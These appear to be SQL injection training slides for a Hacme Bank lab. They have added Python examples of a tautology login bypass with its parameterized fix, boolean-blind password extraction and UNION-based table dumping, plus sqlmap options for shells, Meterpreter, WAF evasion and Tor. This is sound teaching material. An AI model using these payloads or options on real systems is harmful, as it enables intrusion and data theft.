SQL Injection
BY: Manish Bhandarkar
LAB Setup:
1) VM with Hacme Bank installed: http://ninja-sec.com/index.php/hacme-bank-prebuilt-vmware-image-ninja-sec-com/
2) SQL-Map for Windows: https://github.com/sqlmapproject/sqlmap/zipball/master
3) SQL-Map for Unix: preinstalled on BackTrack 5
OWASP TOP 10
A1 : Injection
Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.
Injections
Common types of injection: SQL, LDAP, XPath, etc.
IMPACT: as disastrous as handing the whole database over to the attacker
Can also lead to OS-level access (when the database account can run commands or write files)
Definition
Exploiting poorly filtered or incorrectly escaped SQL queries so that data supplied by the user is executed as part of the query
Types
Error-based injections
Blind injections (e.g. Boolean-based, where only a true/false difference in the page is visible)
How do they work?
Application presents a form to the attacker
Attacker sends an attack in the form data
Application forwards the attack to the database inside a SQL query
Database runs the query containing the attack and returns the result set to the application (if the data is encrypted at rest the application decrypts it as normal, so storage encryption does not stop the attack)
Application renders the data to the user, including data the attacker was never authorized to see
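The five steps above, as an added example that is not part of the original slides: a hypothetical login handler that concatenates form data into its query (steps 1-3), the query the database actually runs (step 4), and the rows that come back to the user (step 5), beside the parameterized version that closes the hole. The `users` table, its rows and the function names are constructed for this example; the payloads `' OR '1'='1` and `alice'--` are the classic tautology and comment-truncation attacks.

```python
import sqlite3


def make_db():
    """Constructed sample database (not from the original page): one users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", 1200), ("bob", "hunter2", 300)],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Steps 1-3: the form fields are pasted straight into the SQL text."""
    query = (
        "SELECT username, balance FROM users "
        "WHERE username = '%s' AND password = '%s'" % (username, password)
    )
    # Step 4: the database runs whatever SQL the attacker's data turned the query into.
    # With password = "' OR '1'='1" the WHERE clause becomes
    #   username = 'alice' AND password = '' OR '1'='1'
    # which is true for every row; with username = "alice'--" the rest of the
    # WHERE clause is commented out and no password is checked at all.
    return conn.execute(query).fetchall()


def login_fixed(conn, username, password):
    """Same query with bind parameters: the driver sends the values separately
    from the SQL text, so the quotes in the payload are just characters in a
    string literal and never reach the parser as syntax."""
    query = "SELECT username, balance FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Step 5: the vulnerable handler hands every account back to the attacker.
    print(login_vulnerable(db, "alice", "' OR '1'='1"))
    print(login_vulnerable(db, "alice'--", "wrong"))
    # The parameterized handler returns nothing for the same payload.
    print(login_fixed(db, "alice", "' OR '1'='1"))
```

The fix is not escaping: `login_fixed` never builds SQL from user data, so there is nothing to escape. Escaping (or a WAF) only argues with the attacker about which characters are dangerous.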
SQL MAP
SQL MAP INTRODUCTION
Powerful command line utility to exploit SQL Injection vulnerabilities. Supports the following databases:
MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB
TECHNIQUES OF SQL INJECTION
Boolean-based blind
Time-based blind
Error-based
UNION query
Stacked queries
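What "Boolean-based blind" means in practice, as an added example that is not code from sqlmap or from the original slides: the only thing the attacker can observe is whether a page says "found" or "not found", so a secret is recovered one character at a time by asking true/false questions and bisecting over the printable ASCII range, which is the same approach sqlmap's blind technique uses. The `products` and `users` tables, the `product_exists` endpoint and the `Oracle` helper are constructed for this example and run against an in-memory SQLite database; SQLite has no `sleep()` function, so the time-based variant (the same questions answered by a delay instead of page content) and error-based extraction, which need DBMS-specific functions, are not shown.

```python
import sqlite3


def make_db():
    """Constructed sample schema (not from the original page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO products VALUES (1, 'widget')")
    conn.execute("INSERT INTO users VALUES ('admin', 'Pa55w0rd')")
    return conn


def product_exists(conn, product_id):
    """Hypothetical vulnerable endpoint: the numeric id is interpolated unquoted,
    and the page only reveals whether a product was found (True/False)."""
    query = "SELECT name FROM products WHERE id = %s" % product_id
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False


class Oracle:
    """Turns the endpoint into a yes/no oracle and counts the requests used."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        # id 1 exists, so the page says "found" exactly when the condition is true:
        #   ... WHERE id = 1 AND (<condition>)
        return product_exists(self.conn, "1 AND (%s)" % condition)


def blind_length(oracle, subquery, max_len=64):
    """Bisect on length((subquery)) > mid; invariant: true length is in [lo, hi]."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask("length((%s)) > %d" % (subquery, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(oracle, subquery):
    """Recover the subquery's value character by character, bisecting the
    printable ASCII range (32..126) with unicode(substr(value, pos, 1)) > mid."""
    value = ""
    for pos in range(1, blind_length(oracle, subquery) + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask("unicode(substr((%s), %d, 1)) > %d" % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value


def steal_admin_password(conn):
    """Returns the recovered password and how many requests it took."""
    oracle = Oracle(conn)
    secret = blind_extract(oracle, "SELECT password FROM users WHERE username='admin'")
    return secret, oracle.requests


if __name__ == "__main__":
    print(steal_admin_password(make_db()))
```

Each character costs about seven requests instead of up to 95, which is why blind extraction of whole tables is feasible and why a burst of near-identical requests differing only in a numeric comparison is a strong detection signal in web server logs.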
SQL MAP OPTION KEYS
o -u <URL> (target URL)
o --dbs (enumerate databases)
o -r <file> (load the raw HTTP request from a .txt file)
o --technique (SQL injection technique(s) to use)
o --dbms (specify the back-end DBMS instead of letting sqlmap fingerprint it)
o -D <database name> --tables
o -T <table name> --columns
o -C <column name> --dump
o --cookie (send an authenticated session cookie)
o --dump-all
SQL MAP FLOW
Enumerate the database names
Select a database and enumerate its tables
Select a table and enumerate its columns
Select the columns and dump the rows (data)
Dump whatever you need
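The enumeration flow above (tables, then columns, then rows) carried out by hand with UNION-query injection, as an added example that is not sqlmap's code and not from the original slides. Against SQLite there is no information_schema, so the table list and the column list both come from the `sqlite_master` catalogue, with column names pulled out of the stored CREATE statement; the column count of the original query is found first by appending `UNION ALL SELECT NULL, NULL, ...` until the database stops erroring, as sqlmap does. The `products`/`users` schema, the `search_vulnerable` endpoint and the simple DDL parser (which assumes no commas inside column types) are constructed for this example.

```python
import sqlite3


def make_db():
    """Constructed sample schema (not from the original page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", [(1, "widget"), (2, "gadget")])
    conn.executemany("INSERT INTO users VALUES (?, ?)", [("admin", "Pa55w0rd"), ("guest", "guest")])
    return conn


def search_vulnerable(conn, name):
    """Hypothetical injectable endpoint: returns the first column of every
    matching row, or [] when the database raised an error (the app swallows it)."""
    query = "SELECT name FROM products WHERE name = '%s'" % name
    try:
        return [row[0] for row in conn.execute(query).fetchall()]
    except sqlite3.Error:
        return []


def find_column_count(fetch, max_cols=10):
    """UNION needs the same number of columns as the original SELECT; probe 1..max."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        if fetch("x' UNION ALL SELECT %s--" % nulls):  # [None] means the UNION parsed
            return n
    raise RuntimeError("could not determine column count")


def union_select(fetch, ncols, expr, from_clause):
    """Put our expression in the first column, pad the rest with NULL, comment
    out the trailing quote. 'x' matches no product, so only our rows come back."""
    cols = [expr] + ["NULL"] * (ncols - 1)
    rows = fetch("x' UNION ALL SELECT %s %s--" % (",".join(cols), from_clause))
    return [r for r in rows if r is not None]


def enumerate_tables(fetch, ncols):
    return union_select(fetch, ncols, "name", "FROM sqlite_master WHERE type='table'")


def enumerate_columns(fetch, ncols, table):
    """SQLite stores the CREATE statement; take the first word of each column spec.
    Simplified parser: assumes no commas inside types such as DECIMAL(10,2)."""
    ddl = union_select(fetch, ncols, "sql", "FROM sqlite_master WHERE name='%s'" % table)[0]
    body = ddl[ddl.index("(") + 1 : ddl.rindex(")")]
    return [spec.strip().split()[0] for spec in body.split(",")]


def dump_table(fetch, ncols, table, columns):
    """Concatenate all columns into the one column we can read back."""
    expr = "||':'||".join(columns)
    return union_select(fetch, ncols, expr, "FROM " + table)


def sqlmap_style_flow(conn):
    """Tables -> columns -> rows, the same order the slide describes."""
    fetch = lambda payload: search_vulnerable(conn, payload)
    ncols = find_column_count(fetch)
    loot = {}
    for table in enumerate_tables(fetch, ncols):
        cols = enumerate_columns(fetch, ncols, table)
        loot[table] = (cols, dump_table(fetch, ncols, table, cols))
    return loot


if __name__ == "__main__":
    for table, (cols, rows) in sqlmap_style_flow(make_db()).items():
        print(table, cols, rows)
```

On MySQL, PostgreSQL or SQL Server the same flow reads `information_schema.tables` and `information_schema.columns` instead of `sqlite_master`; sqlmap's `--dbms` switch selects which catalogue queries it sends.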
WHY USE SQL MAP?
Built in capabilities for cracking hashes
Options of running user defined queries
You could run OS level commands
You could have an interactive OS shell
Meterpreter shell with Metasploit
EXTRA USEFUL SQL MAP OPTION KEYS 1
--os-cmd Run any OS level command
--os-shell Starts an interactive shell
--os-pwn Injects a Meterpreter shell
--tamper Apply tamper scripts to the payloads for evading a WAF
EXTRA USEFUL SQL MAP OPTION KEYS 2
--tor: Use Tor anonymity network
--tor-port: Set Tor proxy port other than default
--tor-type: Set Tor proxy type (HTTP - default, SOCKS4 or SOCKS5)
--check-payload: Offline WAF/IPS/IDS payload detection testing (present in the sqlmap versions of this era; removed from later releases)
--check-waf: Check for existence of WAF/IPS/IDS protection (likewise removed from later releases, where WAF detection runs automatically)
--gpage: Use Google dork results from the specified page number
--tamper: custom tamper scripts
WANT TO EXPLORE MORE?
SQL MAP Usage Guide http://sqlmap.sourceforge.net/doc/README.html
SQL MAP WITH TOR http://www.coresec.org/2011/04/24/sqlmap-with-tor/
THANK YOU
BY: Manish Bhandarkar http://www.hackingforsecurity.blogspot.com